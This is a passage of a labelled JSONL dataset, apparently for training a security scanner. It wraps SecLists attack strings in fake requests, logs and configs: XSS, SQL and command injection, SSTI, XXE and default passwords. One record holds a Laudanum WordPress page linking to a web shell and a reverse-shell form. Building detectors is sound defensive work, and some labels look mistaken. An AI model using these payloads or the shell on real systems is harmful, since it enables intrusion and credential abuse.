/api/ping?host=%22%7C%20%5B%202%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%20%5B%202%20-ne%20%24%28echo%20MNLBVU%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_01336", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=execInfo.templateStack[0].getClass.forName(\"org.thymeleaf.Thymeleaf\").getField(\"VERSION\").get(null) HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "execInfo.templateStack[0].getClass.forName(\"org.thymeleaf.Thymeleaf\").getField(\"VERSION\").get(null)", "injection_type": "SSTI"}}]} {"id": "seclists_01337", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Multiline w/Carriage Returns</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Multiline w/Carriage Returns", "injection_type": "XSS"}}]} {"id": "seclists_01338", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%", "injection_type": "cmd"}}]} {"id": "seclists_01339", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"document_root\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"document_root\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01340", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = t'exec master..xp_cmdshell 'nslookup www.google.com'--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "t'exec master..xp_cmdshell 'nslookup www.google.com'--", "injection_type": "SQL"}}]} {"id": "seclists_01341", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents). HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents).", "injection_type": "XSS"}}]} {"id": "seclists_01342", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"'onload=alert(1)><svg/1='\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'onload=alert(1)><svg/1='", "injection_type": "XSS"}}]} {"id": "seclists_01343", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "injection_type": "cmd"}}]} {"id": "seclists_01344", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf <?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[' or 1=1 or ''=']]></foo>", "injection_type": "cmd"}}]} {"id": "seclists_01345", "source": "seclists", "source_license": "MIT", "text": "password: Gigabyte,admin,admin,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Gigabyte,admin,admin,"}}]} {"id": "seclists_01346", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or a = a';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or a = a", "injection_type": "SQL"}}]} {"id": "seclists_01347", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=mojo\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mojo"}}]} {"id": "seclists_01348", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Tiny,<BLANK>,Tiny,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Tiny,<BLANK>,Tiny,"}}]} {"id": "seclists_01349", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '%27%20or%201=1';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%20or%201=1", "injection_type": "SQL"}}]} {"id": "seclists_01350", "source": "seclists", "source_license": "MIT", "text": "password: Nokia,Security Code,12345,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Nokia,Security Code,12345,"}}]} {"id": "seclists_01351", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><q id=x tabindex=1 onactivate=alert(1)></q></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<q id=x tabindex=1 onactivate=alert(1)></q>", "injection_type": "XSS"}}]} {"id": "seclists_01352", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, self contained, shuffled\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, self contained, shuffled", "injection_type": "XSS"}}]} {"id": "seclists_01353", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <iframe%20src=\"javascript:alert(1) HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <iframe%20src=\"javascript:alert(1)", "injection_type": "XSS"}}]} {"id": "seclists_01354", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:pandas@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pandas"}}]} {"id": "seclists_01355", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\\\\\\\*", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\\\\\\\*", "injection_type": "cmd"}}]} {"id": "seclists_01356", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<content onbeforecopy=\"alert(1)\" contenteditable>test</content> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<content onbeforecopy=\"alert(1)\" contenteditable>test</content>", "injection_type": "XSS"}}]} {"id": "seclists_01357", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Name: Backslash-obfuscated XBL injection - variant 1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Backslash-obfuscated XBL injection - variant 1", "injection_type": "XSS"}}]} {"id": "seclists_01358", "source": "seclists", "source_license": "MIT", "text": "password: johnnie\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "johnnie"}}]} {"id": "seclists_01359", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '28 %';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "28 %", "injection_type": "SQL"}}]} {"id": "seclists_01360", "source": "seclists", "source_license": "MIT", "text": "password: alchemy\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "alchemy"}}]} {"id": "seclists_01361", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: or", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or", "injection_type": "cmd"}}]} {"id": "seclists_01362", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=& ping -i 30 127.0.0.1 & HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "& ping -i 30 127.0.0.1 &", "injection_type": "cmd"}}]} {"id": "seclists_01363", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\" or \"\"-\" HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\" or \"\"-\"", "injection_type": "SQL"}}]} {"id": "seclists_01364", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf --", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "--", "injection_type": "cmd"}}]} {"id": "seclists_01365", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\", "injection_type": "cmd"}}]} {"id": "seclists_01366", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\\\", "injection_type": "cmd"}}]} {"id": "seclists_01367", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"http_client_ip\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"http_client_ip\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01368", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Buffalo/MELCO,root,<BLANK>,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Buffalo/MELCO,root,<BLANK>,"}}]} {"id": "seclists_01369", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='><script>alert(document.cookie);</script> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'><script>alert(document.cookie);</script>", "injection_type": "cmd"}}]} {"id": "seclists_01370", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><http://onxxx%3D1/</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<http://onxxx%3D1/", "injection_type": "XSS"}}]} {"id": "seclists_01371", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '\") or pg_sleep(__TIME__)--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\") or pg_sleep(__TIME__)--", "injection_type": "SQL"}}]} {"id": "seclists_01372", "source": "seclists", "source_license": "MIT", "text": "filename=%7f", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7f", "injection_type": "cmd"}}]} {"id": "seclists_01373", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=UNIX,mail,mail,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "UNIX,mail,mail,"}}]} {"id": "seclists_01374", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, evil tags, internet explorer\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_01375", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<table onmousemove=\"alert(1)\">test</table>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<table onmousemove=\"alert(1)\">test</table>", "injection_type": "XSS"}}]} {"id": "seclists_01376", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=rampage\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "rampage"}}]} {"id": "seclists_01377", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \"%0aecho$IFSRFLPIG$((74%2B10))$(echo$IFSRFLPIG)RFLPIG\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%0aecho$IFSRFLPIG$((74%2B10))$(echo$IFSRFLPIG)RFLPIG\\", "injection_type": "cmd"}}]} {"id": "seclists_01378", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>:target {transform: rotate(180deg);}</style><a id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></a></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><a id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></a>", "injection_type": "XSS"}}]} {"id": "seclists_01379", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JHKWGE%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_01380", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:moocow@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "moocow"}}]} {"id": "seclists_01381", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_01382", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: ha.ckers.org</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01383", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: Uses special characters as variable names and self-executes the concatenated payload trigger.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Uses special characters as variable names and self-executes the concatenated payload trigger.", "injection_type": "XSS"}}]} {"id": "seclists_01384", "source": "seclists", "source_license": "MIT", "text": "filename=%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20YTYKPD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01385", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %27||echo$IFSVGJPPI$((78%2B43))$(echo$IFSVGJPPI)VGJPPI&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27||echo$IFSVGJPPI$((78%2B43))$(echo$IFSVGJPPI)VGJPPI&", "injection_type": "cmd"}}]} {"id": "seclists_01386", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '' or ''^'';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or ''^'", "injection_type": "SQL"}}]} {"id": "seclists_01387", "source": "seclists", "source_license": "MIT", "text": "filename=ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|", "injection_type": "cmd"}}]} {"id": "seclists_01388", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Dlink,admin,public,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Dlink,admin,public,"}}]} {"id": "seclists_01389", "source": "seclists", "source_license": "MIT", "text": "filename=@variable", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "@variable", "injection_type": "cmd"}}]} {"id": "seclists_01390", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<source id=x tabindex=1 onfocusin=alert(1)></source> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<source id=x tabindex=1 onfocusin=alert(1)></source>", "injection_type": "XSS"}}]} {"id": "seclists_01391", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"http://example:443\" >]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"http://example:443\" >]>", "injection_type": "XXE"}}]} {"id": "seclists_01392", "source": "seclists", "source_license": "MIT", "text": "username=+sqlvuln&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "+sqlvuln", "injection_type": "SQL"}}]} {"id": "seclists_01393", "source": "seclists", "source_license": "MIT", "text": "username=\"));waitfor delay '0:0:__TIME__'--&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"));waitfor delay '0:0:__TIME__'--", "injection_type": "SQL"}}]} {"id": "seclists_01394", "source": "seclists", "source_license": "MIT", "text": "<?php\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net>\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file provides a convenient menu of Laudanum tools from a Word Press settings\n*** page.\n***\n*** Written by Jason Gillam <jgillam@secureideas.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n*** \n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n*** \n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n?>\n\n\n<div class=\"wrap\">\n\t<h2>Laudanum Tools</h2>\n\t<ul>\n\t<li><a href=\"<?php echo plugins_url('shell.php', __FILE__);?>\">Shell</a> </li>\n\t<li><a href=\"<?php echo plugins_url('dns.php', __FILE__);?>\">DNS</a> </li>\n\t<li><a href=\"<?php echo plugins_url('host.php', __FILE__);?>\">Host Lookup</a> </li>\n\t<li><a href=\"<?php echo plugins_url('file.php', __FILE__);?>\">File Browser</a> </li>\n\t<li><a href=\"<?php echo plugins_url('proxy.php', __FILE__);?>\">Proxy</a> </li>\n\t\n\t<li>Reverse Shell - \n\t<form action=\"<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>\" method=\"post\">\n\t\tIP: <input name=\"ip\" type=\"text\" value=\"127.0.0.1\">\n\t\tPort: <input name=\"port\" type=\"text\" value=\"8888\">\n\t\t<input type=\"submit\" value=\"Connect\"></p>\n\n\t</form></li>\n\t<!--<li><a href=\"<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>\">Reverse Shell (requires hard-coded config)</a> </li>-->\n\t</form>\n\t<li><a href=\"<?php echo plugins_url('killnc.php', __FILE__);?>\">kill nc (recover if nc screws up your shell)</a> </li>\n\t\n\t</ul>\n\t* for reverse shell, use netcat to listen, e.g. \"nc -v -n -l 8888\"\n</div>\n\t", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "settings.php"}}]} {"id": "seclists_01395", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><applet onkeyup=\"alert(1)\" contenteditable>test</applet></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<applet onkeyup=\"alert(1)\" contenteditable>test</applet>", "injection_type": "XSS"}}]} {"id": "seclists_01396", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ))))))))))", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "))))))))))", "injection_type": "cmd"}}]} {"id": "seclists_01397", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=%2A%28%7C%28mail%3D%2A%29%29 HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A%28%7C%28mail%3D%2A%29%29", "injection_type": "LDAP"}}]} {"id": "seclists_01398", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %7C%20%5B%206%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%206%20-ne%20%24%28echo%20NDHYKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_01399", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", "injection_type": "XSS"}}]} {"id": "seclists_01400", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:kenny", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "kenny"}}]} {"id": "seclists_01401", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"</style>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "</style>", "injection_type": "XSS"}}]} {"id": "seclists_01402", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, html breaking</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, html breaking", "injection_type": "XSS"}}]} {"id": "seclists_01403", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=1 or 1=1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1 or 1=1", "injection_type": "SQL"}}]} {"id": "seclists_01404", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><meter onmousemove=\"alert(1)\">test</meter></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<meter onmousemove=\"alert(1)\">test</meter>", "injection_type": "XSS"}}]} {"id": "seclists_01405", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", "injection_type": "XSS"}}]} {"id": "seclists_01406", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: META HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: META", "injection_type": "XSS"}}]} {"id": "seclists_01407", "source": "seclists", "source_license": "MIT", "text": "password: Digital Equipment,REPORT,REPORT,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,REPORT,REPORT,"}}]} {"id": "seclists_01408", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%3B%20str%3D%24%28echo%20WBDHXY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "injection_type": "cmd"}}]} {"id": "seclists_01409", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: ha.ckers.org\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01410", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:mart@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "mart"}}]} {"id": "seclists_01411", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &#60;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#60;", "injection_type": "cmd"}}]} {"id": "seclists_01412", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": 